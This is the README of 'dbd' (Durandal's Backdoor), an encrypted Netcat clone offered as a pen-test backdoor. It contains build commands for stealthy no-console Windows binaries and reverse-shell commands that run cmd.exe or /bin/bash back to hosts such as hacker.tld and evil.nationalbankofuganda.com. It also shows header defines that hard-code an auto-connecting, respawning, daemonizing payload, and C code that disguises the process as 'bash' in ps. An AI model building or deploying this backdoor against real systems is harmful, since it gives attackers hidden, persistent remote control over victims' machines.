Skip to content

gitdurandal/dbd

Repository files navigation

	  d8888b. d8888b. d8888b.
	  88  `8D 88  `8D 88  `8D
	  88   88 88oooY' 88   88
	  88   88 88~~~b. 88   88
	  88  .8D 88   8D 88  .8D
	  Y8888D' Y8888P' Y8888D'

#[Durandal's Backdoor](http://gitbrew.org/dbd)
#Copyright (C) 2013 Kyle Barnthouse [<kbarnthouse@hephaestussec.com>](mailto:kbarnthouse@hephaestussec.com)
#dbd is distributed under the GNU GPL
#Mipsbe binary added by Darkerego [<https://github.com/darkerego>] [(mailto:donotaccept@gmx.com)]

###SYNOPSIS

dbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. dbd supports TCP/IP communication only. Source code and binaries are distributed under the GNU General Public License.

###COMPILATION

	$ make
	usage:
	  make unix     - Linux, NetBSD, FreeBSD, OpenBSD
	  make unix32  - Linux, NetBSD, FreeBSD, OpenBSD 32-bit
	  make sunos    - SunOS (Solaris)
	  make win32    - native win32 console app (w/ Cygwin + MinGW)
	  make win32bg  - create a native win32 no-console app (w/ Cygwin + MinGW)
	  make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
	  make mingw    - native win32 console app (w/ MinGW MSYS)
	  make mingwbg  - native win32 no-console app (w/ MinGW MSYS)
	  make mingwbg CFLAGS=-DSTEALTH - stealthy no-console app (w/ MinGW MSYS)
	  make cygwin   - Cygwin console app
	  make darwin   - Darwin

	cross-compile options:
	  make mingw-cross    - win32 cross compile (i586-mingw32msvc-gcc)
	  make mingwbg-cross  - win32 no-console cross compile (i586-mingw32msvc-gcc)
	  make mingwbg-cross CFLAGS=-DSTEALTH - stealthy win32 cross compile
	  make unix CROSS_COMPILE=<path/to/toolchain-> - cross compile for any arch
	
	roll up a tarball (move your compiled stuff to binaries/ first:
	  make dist     - create tarball with source files, readme, and binaries/


To compile dbd under a Unix-like operating system you need gcc and relevant development tools. For Linux, FreeBSD, NetBSD, OpenBSD (and possibly others), type:

	$ make unix

For SunOS/Solaris, type:

	$ make sunos

To compile dbd under Microsoft Windows (NT/2K/XP/2K3) you need MinGW+MSYS, or Cygwin with full development support (Cygwin's MinGW gcc). To compile a native Win32 dbd console application under Cygwin, type:

	$ make win32

or, under MSYS:

	$ make mingw

To compile a no-console ("WinMain") application under Cygwin, type:

	$ make win32bg

or, under MSYS:

	$ make mingwbg

To compile a Cygwin-specific console application, type:

	$make cygwin

You may want to change the default behaviour of dbd. One of the most important thing is to change the default shared secret to your own pass phrase. Edit dbd.h and replace with your preferences. You may, for example, want to hardcode a host + port to connect to if dbd is started without options. Complete examples are provided in dbd.h.

###SAMPLE USES

With a little imagination, dbd can be used for many things:

Use dbd to securely transfer files between two networks:

	snafu$ dbd -l -p 12345 -k secret > output.file

	fubar$ cat input.file | dbd -k secret snafu 12345

or from win32:

	C:\somedir>type input.fil | dbd -k secret snafu 12345

Use dbd as a simple (but secure) chat:

	snafu$ dbd -P snafu -Hon fubar 1234

	fubar$ dbd -Pfubar -Hon -l -p 1234

Use dbd as a pen-test backdoor:

	C:\hacked box>dbdbg.exe -r1800 -q -e cmd.exe hacker.tld 443


or under Unix-like OSes:

	root@owned# ./dbd -r1800 -Don -e /bin/bash hacker.tld 993

###HARD CODING OPTIONS

In addition to using command line options, you can hard code variables by using #defines in dbd.h. To do this, set the variables you wish to use as named constants and compile as normal. For example, if you wanted to hard code a dbd executable that connected back to "evil.nationalbankofuganda.com" on port 995, and executed "/bin/bash" you could run:

	root@owned# ./dbd -e /bin/bash evil.nationalbankofuganda.com 995

or using hard-coded #defines, you could edit dbd.h:

```c
#define DOLISTEN 0
#define HOST "evil.nationalbankofuganda.com"
#define PORT 995
#define EXECPROG "/bin/bash"
```

	You can also set respawn and stealth options to help maintain your connection:

```c
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 900
#define QUIET 1
#define DAEMONIZE 1
```

This will set the connection to daemonize ("melt" in malware terms), never send output to STDOUT, and attempt to respawn the connection every 15 minutes should it ever disconnect from the listener.

###ROMULAN CLOAKING TECHNOLOGY

Now we're getting into the fun stuff. Once you are a mastar at hard-coding options into your backdoor, you can use what is quite possibly the most fun named constant at our disposal: CLOAK. To do this, simply set the value:

```c
#define CLOAK 1
```

NOTE: this currently only works on *nix compiles. Eventually I plan on adding Win32 process migration/hooking so those targets can feel some Romulan love as well.

For *nix environments, this option scrubs argv[0] and replaces it with the string "bash\0". It also scrubs all other argv[]'s (it'd look silly if ps returned "bash -e /bin/bash someremotehost.com 443" now wouldn't it?) I hope it goes without saying that you CANNOT USE THIS OPTION UNLESS YOU ARE HARD CODING YOUR VARIABLES INTO DBD.H. Also, if you're testing this on your own system it's gonna be fun picking the right pid to kill. ;)

Feel free to use this scrubber in anything you happen to be working on:

```c
//grab our named constant
int cloak = CLOAK;

//Engage cloaking device
if(cloak)
{
	#ifdef WIN32
	//stub              
	#else
	//change argv[0] to say bash       
	int scrub;
	strncpy((char *)argv[0], "\0", strlen((char *)argv[0]) + 1);
	strcpy((char *)argv[0], "bash\0");    
	for (scrub = 1; scrub < argc; scrub++)
	{                     
		 strncpy((char *)argv[scrub], "\0", strlen((char *)argv[scrub]) + 1);
	}                 
	#endif
}
```

###WARNING

Do not pass cached input (a file with commands or similar) to a listening "dbd -e" session. "dbd -e" is using pipes to pass data between the program being executed and dbd. Pipes are used (instead of plain pass-through duplicate file descriptors) because of encryption between the pipes and the socket. In order to prevent the writing end of one of the pipes from blocking the whole process, I turned it into a non-blocking descriptor. There is a chance that when passing too much input at a time through to the -e program, it will be truncated (cut off) since the pipe buffer (in the OS) can't hold all of the data. This problem can be solved by making dbd multi-threaded for instance, but I'll avoid this as long as possible for compatibility reasons.

##CROSS-COMPILING

Since dbd was designed to interoperate with other tools/frameworks, make now allows win32 cross compiling on Linux systems that have the mingw32-gcc toolchain.  These options are almost identical to their Windows-native counterpart with the addition of "-cross" after the chosen build.  Example:

	$ make mingw-cross

will do the same thing on a Linux system that

	$ make mingw

would do on a win32 system with mingw/msys installed on it.

Right now all cross-compile options are built with Kali Linux in mind, but should work on any *nix with a little love.  If you have mingw32-gcc installed and make won't build, edit the WCC variable at the top of the Makefile and put the path to your mingw32-gcc binary.  

As of dbd-1.5 you can use any crossbuild toolchain to compile dbd by setting the toolchain prefix as CROSS_COMPILE.  For example, building an arm version is as easy as:

	$ make unix CROSS_COMPILE=arm-linux-gnueabi-

##ADVANCED WIZARDRY

If you wish to integrate dbd with an exploitation framework, you can write a module that generates a custom dbd.h with configuration options specific to your target.  Anything not explicitly #defined in this file will still use the defaults so you don't have to write everything in the header.  Example: have a file rm dbd.h and replace with:

```c
#define DOLISTEN 0
#define HOST "evil.nationalbankofuganda.com"
#define PORT 995
#define EXECPROG "/bin/bash"
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 900
#define QUIET 1
#define CLOAK 1
#define SHARED_SECRET "customcrypto"
```

then call make <target options> to build an auto connecting payload with cloaking and respawning that connects back to a listening dbd agent on evil.nationalbankofuganda.com running with the options:

	$ dbd -l -p 995 -k customcrypto

Another advanced trick is to compile dbd using dietlibc or uClibc.  to compile a dietlibc linux dbd agent, use:

	$ make unix CROSS_COMPILE="diet -Os "

Pay attention to the space after the s in the string.  This allows the Makefile to add gcc with the standard CFLAGS and LDFLAGS so your agent builds properly.  The advantage of using dietlibc is that it produces a very tiny 100% static executable for the target environment (around 70K for a linux dbd agent before packing as opposed to the standard 700K+ with glibc and gcc -static).  Using uClibc is even easier, since you just set the crossbuild prefix for your toolchain under CROSS_COMPILE.

##LICENSE  
dbd Copyright (C) 2013 Kyle Barnthouse kbarnthouse@hephaestussec.com

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA

See the COPYING file for more information.
---
dbd's AES-CBC-128 + HMAC-SHA1 implementation is Copyright (C) Christophe Devine devine@cr0.net and is distributed under the GNU General Public License (GPL).

Some code (for doexec_win32.h) has been derived from doexec.c from the Win32 port of Netcat (C) Weld Pond and hobbit. Parts of doexec.c is Copyright (C) 1994 Nathaniel W. Mishkin (doexec.c code was originally derived from rlogind.exe).

The original version of Netcat was written by hobbit hobbit@avian.org. The NT version was done by Weld Pond weld@l0pht.com.

---

(C) Kyle Barnthouse [<kbarnthouse@hephaestussec.com>](mailto:kbarnthouse@hephaestussec.com)
Security Consultant  
[gitbrew.org](https://gitbrew.org)  
[Hephaestus Security](http://hephaestussec.com)